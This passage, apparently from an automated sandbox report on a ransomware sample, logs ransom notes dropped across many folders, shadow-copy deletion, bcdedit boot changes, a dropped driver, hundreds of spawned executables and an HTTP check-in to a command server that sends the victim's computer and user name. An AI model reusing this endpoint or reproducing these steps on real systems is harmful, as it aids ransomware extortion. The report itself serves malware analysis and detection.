Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\d5vrebxd.default-release\storage\default\moz-extension+++0b99e65e-22a6-4b3f-a101-8818eb39c6a0^userContextId=4294967295\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\VisualElements\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\TGVUK4BG\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Mozilla Firefox\fonts\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds\Feeds for United States~\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Control Panel\Desktop\TileWallpaper = "0" reg.exe File created C:\Program Files\Java\jdk1.7.0_80\bin\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\tl\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe HTTP URL 10 http://sec.timerz.org/addrecord.php?apikey=ab89_api_key&compuser=AVGLFESB|Admin&sid=a1wzRrVf6WBPmIHw&phase=FINISH Process not Found File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\Links\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Optional\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\hu\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Public\Videos\Sample Videos\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Mozilla Firefox\uninstall\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Public\Desktop\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\Documents\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\default_apps\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\art\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\lib\images\cursors\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\db\bin\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\amd64\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\ProgramData\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\vcRuntimeMinimum_amd64\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\km\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\lib\zi\America\Kentucky\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00008352\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Google\Chrome\Application\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\hrtfs\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Recovery\f840bc82-aff2-11ea-839f-f21450b4f854\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\Desktop\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\plugins\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\pa\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\lib\zi\Indian\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\d5vrebxd.default-release\storage\default\moz-extension+++0b99e65e-22a6-4b3f-a101-8818eb39c6a0^userContextId=4294967295\idb\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\lib\jfr\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\Favorites\MSN Websites\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Extensions\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\js\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Mozilla Firefox\browser\features\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\tr\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\lib\zi\Etc\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Protect\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 1220 bcdedit.exe 1368 bcdedit.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\system32\Drivers\PROCEXP152.SYS B4ux2Scs64.exe -
Executes dropped EXE 359 IoCs
pid Process 1936 NWgvgGUu.exe 2000 B4ux2Scs.exe 832 B4ux2Scs64.exe 1644 B4ux2Scs.exe 360 B4ux2Scs.exe 1128 B4ux2Scs.exe 1756 B4ux2Scs.exe 2044 B4ux2Scs.exe 676 B4ux2Scs.exe 436 B4ux2Scs.exe 1636 B4ux2Scs.exe 992 B4ux2Scs.exe 1068 B4ux2Scs.exe 1032 B4ux2Scs.exe 676 B4ux2Scs.exe 1128 B4ux2Scs.exe 1960 B4ux2Scs.exe 360 B4ux2Scs.exe 1736 B4ux2Scs.exe 524 B4ux2Scs.exe 700 B4ux2Scs.exe 992 B4ux2Scs.exe 1372 B4ux2Scs.exe 1848 B4ux2Scs.exe 224 B4ux2Scs.exe 1384 B4ux2Scs.exe 1756 B4ux2Scs.exe 1848 B4ux2Scs.exe 652 B4ux2Scs.exe 1384 B4ux2Scs.exe 1176 B4ux2Scs.exe 224 B4ux2Scs.exe 700 B4ux2Scs.exe 232 B4ux2Scs.exe 236 B4ux2Scs.exe 700 B4ux2Scs.exe 864 B4ux2Scs.exe 1032 B4ux2Scs.exe 760 B4ux2Scs.exe 524 B4ux2Scs.exe 1552 B4ux2Scs.exe 1948 B4ux2Scs.exe 232 B4ux2Scs.exe 1052 B4ux2Scs.exe 652 B4ux2Scs.exe 1220 B4ux2Scs.exe 228 B4ux2Scs.exe 224 B4ux2Scs.exe 360 B4ux2Scs.exe 1216 B4ux2Scs.exe 320 B4ux2Scs.exe 1896 B4ux2Scs.exe 224 B4ux2Scs.exe 220 B4ux2Scs.exe 216 B4ux2Scs.exe 756 B4ux2Scs.exe 1896 B4ux2Scs.exe 1572 B4ux2Scs.exe 1220 B4ux2Scs.exe 1652 B4ux2Scs.exe 436 B4ux2Scs.exe 232 B4ux2Scs.exe 1572 B4ux2Scs.exe 1968 B4ux2Scs.exe 1064 B4ux2Scs.exe 1848 B4ux2Scs.exe 212 B4ux2Scs.exe 1372 B4ux2Scs.exe 908 B4ux2Scs.exe 1220 B4ux2Scs.exe 992 B4ux2Scs.exe 1576 B4ux2Scs.exe 980 B4ux2Scs.exe 524 B4ux2Scs.exe 1920 B4ux2Scs.exe 984 B4ux2Scs.exe 896 B4ux2Scs.exe 436 B4ux2Scs.exe 652 B4ux2Scs.exe 1064 B4ux2Scs.exe 1128 B4ux2Scs.exe 220 B4ux2Scs.exe 744 B4ux2Scs.exe 204 B4ux2Scs.exe 1644 B4ux2Scs.exe 1828 B4ux2Scs.exe 1068 B4ux2Scs.exe 216 B4ux2Scs.exe 1512 B4ux2Scs.exe 224 B4ux2Scs.exe 904 B4ux2Scs.exe 1820 B4ux2Scs.exe 212 B4ux2Scs.exe 992 B4ux2Scs.exe 952 B4ux2Scs.exe 980 B4ux2Scs.exe 1156 B4ux2Scs.exe 360 B4ux2Scs.exe 1384 B4ux2Scs.exe 756 B4ux2Scs.exe 236 B4ux2Scs.exe 864 B4ux2Scs.exe 1736 B4ux2Scs.exe 1368 B4ux2Scs.exe 220 B4ux2Scs.exe 592 B4ux2Scs.exe 904 B4ux2Scs.exe 204 B4ux2Scs.exe 216 B4ux2Scs.exe 1468 B4ux2Scs.exe 224 B4ux2Scs.exe 756 B4ux2Scs.exe 524 B4ux2Scs.exe 1920 B4ux2Scs.exe 1512 B4ux2Scs.exe 1840 B4ux2Scs.exe 1680 B4ux2Scs.exe 232 B4ux2Scs.exe 1820 B4ux2Scs.exe 1752 B4ux2Scs.exe 1960 B4ux2Scs.exe 544 B4ux2Scs.exe 568 B4ux2Scs.exe 964 B4ux2Scs.exe 212 B4ux2Scs.exe 1156 B4ux2Scs.exe 1956 B4ux2Scs.exe 744 B4ux2Scs.exe 864 B4ux2Scs.exe 212 B4ux2Scs.exe 1068 B4ux2Scs.exe 1848 B4ux2Scs.exe 1384 B4ux2Scs.exe 864 B4ux2Scs.exe 236 B4ux2Scs.exe 1968 B4ux2Scs.exe 1836 B4ux2Scs.exe 652 B4ux2Scs.exe 1520 B4ux2Scs.exe 952 B4ux2Scs.exe 1920 B4ux2Scs.exe 1576 B4ux2Scs.exe 1840 B4ux2Scs.exe 228 B4ux2Scs.exe 1292 B4ux2Scs.exe 756 B4ux2Scs.exe 1080 B4ux2Scs.exe 1572 B4ux2Scs.exe 1520 B4ux2Scs.exe 964 B4ux2Scs.exe 1920 B4ux2Scs.exe 1652 B4ux2Scs.exe 1156 B4ux2Scs.exe 1064 B4ux2Scs.exe 980 B4ux2Scs.exe 1368 B4ux2Scs.exe 896 B4ux2Scs.exe 760 B4ux2Scs.exe 360 B4ux2Scs.exe 204 B4ux2Scs.exe 1828 B4ux2Scs.exe 1848 B4ux2Scs.exe 948 B4ux2Scs.exe 436 B4ux2Scs.exe 908 B4ux2Scs.exe 320 B4ux2Scs.exe 280 B4ux2Scs.exe 864 B4ux2Scs.exe 1576 B4ux2Scs.exe 1220 B4ux2Scs.exe 1496 B4ux2Scs.exe 1240 B4ux2Scs.exe 220 B4ux2Scs.exe 1848 B4ux2Scs.exe 1572 B4ux2Scs.exe 1820 B4ux2Scs.exe 548 B4ux2Scs.exe 1488 B4ux2Scs.exe 228 B4ux2Scs.exe 1896 B4ux2Scs.exe 1292 B4ux2Scs.exe 592 B4ux2Scs.exe 1224 B4ux2Scs.exe 1840 B4ux2Scs.exe 1652 B4ux2Scs.exe 1836 B4ux2Scs.exe 436 B4ux2Scs.exe 1496 B4ux2Scs.exe 320 B4ux2Scs.exe 236 B4ux2Scs.exe 1572 B4ux2Scs.exe 544 B4ux2Scs.exe 548 B4ux2Scs.exe 1968 B4ux2Scs.exe 904 B4ux2Scs.exe 952 B4ux2Scs.exe 364 B4ux2Scs.exe 980 B4ux2Scs.exe 1052 B4ux2Scs.exe 1216 B4ux2Scs.exe 1652 B4ux2Scs.exe 1068 B4ux2Scs.exe 1220 B4ux2Scs.exe 744 B4ux2Scs.exe 1552 B4ux2Scs.exe 1488 B4ux2Scs.exe 204 B4ux2Scs.exe 1828 B4ux2Scs.exe 1080 B4ux2Scs.exe 1644 B4ux2Scs.exe 948 B4ux2Scs.exe 904 B4ux2Scs.exe 236 B4ux2Scs.exe 1836 B4ux2Scs.exe 1920 B4ux2Scs.exe 228 B4ux2Scs.exe 1652 B4ux2Scs.exe 1240 B4ux2Scs.exe 1220 B4ux2Scs.exe 1064 B4ux2Scs.exe 1552 B4ux2Scs.exe 676 B4ux2Scs.exe 364 B4ux2Scs.exe 964 B4ux2Scs.exe 1080 B4ux2Scs.exe 1052 B4ux2Scs.exe 948 B4ux2Scs.exe 1968 B4ux2Scs.exe 1828 B4ux2Scs.exe 524 B4ux2Scs.exe 212 B4ux2Scs.exe 220 B4ux2Scs.exe 904 B4ux2Scs.exe 1948 B4ux2Scs.exe 